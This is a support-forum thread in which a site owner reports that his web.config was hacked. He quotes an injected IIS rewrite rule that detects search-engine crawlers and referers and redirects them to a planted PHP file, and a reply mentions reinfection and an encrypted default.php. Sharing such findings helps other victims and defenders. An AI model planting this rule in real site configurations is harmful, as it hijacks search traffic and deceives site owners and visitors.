cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 

ASP.Net error on site load, web.config hacked with hanny-appendage.php

Website (unchanged by me in years) would not load.  Support had 21 minute queue, so I looked my self and found the following hacked into the top of my web.config file:

 

<configuration><system.webServer><rewrite><rules>        <rule name="Protect files and directories from prying eyes" stopProcessing="true">
          <match url="^(.*)$" ignoreCase="true" />
          <conditions logicalGrouping="MatchAny">
          <add input="{HTTP_USER_AGENT}" pattern="(bing|google|yahoo|msn|aol)" ignoreCase="true" />
          <add input="{HTTP_REFERER}" pattern="(bing|google|yahoo|msn|aol)" ignoreCase="true" />
          </conditions>
          <action type="Rewrite" url="hanny-appendage.php" appendQueryString="false" />
        </rule>
</rules></rewrite></system.webServer></configuration>

Which blew up of course, because the file already had valid <system.webserver> and <config>  sections.  

 

Ready, Fire, Aim...

 

Jay

 

1 REPLY 1

Re: ASP.Net error on site load, web.config hacked

same problem here and it return back after a month after removing the rewrite part from web.config and deleting the default.php which include encrypted code